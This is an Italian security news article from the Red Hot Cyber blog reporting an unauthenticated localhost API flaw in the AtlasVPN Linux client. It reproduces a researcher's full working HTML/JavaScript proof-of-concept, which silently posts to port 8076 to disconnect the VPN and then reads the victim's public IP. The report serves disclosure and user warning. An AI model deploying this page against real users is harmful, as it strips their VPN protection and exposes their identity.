Red Hot Cyber, il blog italiano sulla sicurezza informatica
Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Select language
English Spanish
Cerca

C’è poco da nascondersi. Il bug sul client di Atlas VPN rende tutti visibili

Redazione RHC : 4 Settembre 2023 16:46

Pochi giorni fa sul sito Reddit è apparsa la notizia della scoperta di una grave vulnerabilità di sicurezza nel client AtlasVPN per il sistema operativo Linux.

Un ricercatore di sicurezza informatica che ha voluto rimanere anonimo ha pubblicato un exploit PoC funzionante e ha dimostrato al pubblico come gli aggressori possono ottenere l’accesso al vero indirizzo IP di qualsiasi utente della versione Linux del client VPN menzionato sopra.

“AtlasVPN non prende sul serio la sicurezza dei suoi utenti. Le loro soluzioni di sicurezza software fanno così schifo che è difficile credere che si tratti di un bug e non di una backdoor. Nessuno può essere così incompetente”, uno specialista anonimo ha criticato l’approccio dell’azienda.

Sponsorizza la prossima Red Hot Cyber Conference!

Il giorno Lunedì 18 maggio e martedì 19 maggio 2026 9 maggio 2026, presso il teatro Italia di Roma (a due passi dalla stazione termini e dalla metro B di Piazza Bologna), si terrà la V edizione della la RHC Conference
Si tratta dell’appuntamento annuale gratuito, creato dalla community di RHC, per far accrescere l’interesse verso le tecnologie digitali, l’innovazione digitale e la consapevolezza del rischio informatico. 
Se sei interessato a sponsorizzare l'evento e a rendere la tua azienda protagonista del più grande evento della Cybersecurity Italiana, non perdere questa opportunità. E ricorda che assieme alla sponsorizzazione della conferenza, incluso nel prezzo, avrai un pacchetto di Branding sul sito di Red Hot Cyber composto da Banner più un numero di articoli che saranno ospitati all'interno del nostro portale. 
Quindi cosa stai aspettando? Scrivici subito a [email protected] per maggiori informazioni e per accedere al programma sponsor e al media Kit di Red Hot Cyber.



Supporta RHC attraverso:
 

  1. L'acquisto del fumetto sul Cybersecurity Awareness
  2. Ascoltando i nostri Podcast
  3. Seguendo RHC su WhatsApp
  4. Seguendo RHC su Telegram
  5. Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber

Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.
 

<html>
 <head>
  <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
 <body>
  <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
 You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
 </code></pre>
   <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
  <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
    <button type="submit" style="display: none"></button>
  </form>
   <script>
    window._currentIP = false;
     // Run main exploit code
    window.addEventListener('load', function () {
      addIPToLog();
      setTimeout(triggerFormSubmission, 1000);
      setTimeout(addIPToLog, 3000);
    });
     // Blind CORS request to atlasvpnd to disconnect the VPN
    function triggerFormSubmission() {
      var logDiv = document.getElementById('log');
      logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
      document.getElementById('stopForm').submit();
    }
     // Gets IP from ipfy API (this, of course, could be your server)
    function addIPToLog() {
      var logDiv = document.getElementById('log');
      var xhr = new XMLHttpRequest();
       xhr.open('GET', 'https://api.ipify.org?format=json', true);
       xhr.onload = function () {
        var ipAddress = window._currentIP;
        if (xhr.status === 200) {
          var response = JSON.parse(xhr.responseText);
          ipAddress = response.ip;
           logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
        } else {
          logDiv.innerHTML += '[-] Error fetching IP address.\n';
        }
         // Check if the IP changed. If yes: Success.
        if (window._currentIP && window._currentIP != ipAddress) {
          logDiv.innerHTML += "[+] Successfully disconnected VPN."
        }
        if (window._currentIP && window._currentIP == ipAddress) {
          logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
        }
         // Save IP for next iteration.
        window._currentIP = ipAddress;
      };
       xhr.send();
    }
  </script>
</body>
</html>

Secondo il ricercatore la vulnerabilità è dovuta a una serie di gravi errori nell’architettura dell’applicazione. Nello specifico, il client AtlasVPN apre l’API su localhost sulla porta 8076, che non ha assolutamente alcun tipo di autenticazione.

Sulla base di ciò, qualsiasi programma in esecuzione sul computer, incluso un browser Web, può avere pieno accesso a questa porta. Ciò significa che qualsiasi sito web con il contenuto appropriato può inviare una richiesta su questa porta e disabilitare banalmente la VPN, rivelando quindi il reale indirizzo IP dell’utente .

L’esperto ha provato a contattare il supporto AtlasVPN per segnalare la vulnerabilità, ma non ha ricevuto risposta. A suo avviso, ciò indica un atteggiamento negligente dell’azienda nei confronti della sicurezza dei propri clienti.

Al momento della pubblicazione di questa notizia, i rappresentanti di AtlasVPN non hanno commentato la situazione. 

Si consiglia a tutti gli utenti del client sotto Linux di prestare attenzione quando visitano siti non verificati o addirittura di modificare temporaneamente il client VPN finché la vulnerabilità non verrà risolta.

Redazione
La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

Lista degli articoli

Articoli in evidenza

SoopSocks: il pacchetto PyPI che sembrava un proxy ma era una backdoor per Windows
Di Antonio Piazzolla - 04/10/2025

La storia di SoopSocks è quella che, purtroppo, conosciamo bene: un pacchetto PyPI che promette utilità — un proxy SOCKS5 — ma in realtà introduce un impianto malevolo ben orchestrato. Non stia...

L’informatica non è più una carriera sicura! Cosa sta cambiando per studenti e aziende
Di Redazione RHC - 04/10/2025

Per decenni, l’informatica è stata considerata una scelta professionale stabile e ricca di opportunità. Oggi, però, studenti, università e imprese si trovano davanti a un panorama radicalmente m...

Quando l’hacker si ferma al pub! Tokyo a secco di birra Asahi per un attacco informatico
Di Redazione RHC - 03/10/2025

Lunedì scorso, Asahi Group, il più grande produttore giapponese di birra, whisky e bevande analcoliche, ha sospeso temporaneamente le sue operazioni in Giappone a seguito di un attacco informatico c...

Criminal Hacker contro Anziani! Arriva Datzbro: Facebook e smartphone nel mirino
Di Redazione RHC - 03/10/2025

Una nuova campagna malevola sta utilizzando Facebook come veicolo per diffondere Datzbro, un malware Android che combina le caratteristiche di un trojan bancario con quelle di uno spyware. L’allarme...

Oltre lo schermo: l’evento della Polizia Postale per una vita sana oltre i social
Di Marcello Filacchioni - 03/10/2025

La Community di Red Hot Cyber ha avuto l’opportunità di partecipare a “Oltre lo schermo”, l’importante iniziativa della Polizia Postale dedicata ai giovani del 2 ottobre, con l’obiettivo di...